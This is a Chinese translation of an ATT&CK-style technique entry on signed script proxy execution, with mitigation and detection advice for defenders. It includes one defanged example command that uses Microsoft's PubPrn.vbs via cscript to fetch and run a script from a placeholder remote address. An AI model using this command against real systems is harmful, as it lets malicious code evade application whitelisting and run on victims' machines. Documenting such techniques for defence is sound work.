签名脚本代理执行
具有可信证书签名的脚本可用于代理恶意文件的执行。
这种行为可能会绕过签名验证限制和不考虑这些脚本的应用程序白名单解决方案。
由 Microsoft 签名的 PubPrn.vbs 可用于代理远程站点的执行。
示例命令:cscript C[:]\Windows\System32\Printing_Admin_Scripts\en-US\pubprn[.]vbs 127.0.0.1 script:http[:]//192.168.1.100/hi.png
还有一些其他签名脚本可以以类似的方式使用。
缓解
在给定的环境中,可能并不需要某些可用于执行其他程序的签名脚本。
如果给定的系统或网络不需要这些脚本,配置应用程序白名单来拦截它们的执行,防止攻击者潜在的滥用。
检测
监视脚本进程(如 cscript) 和命令行参数,查看是否有可用于代理执行恶意文件的脚本(如 PubPrn.vbs)。
- 译者: 林妙倩、戴亦仑 . source:cve.scap.org.cn
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论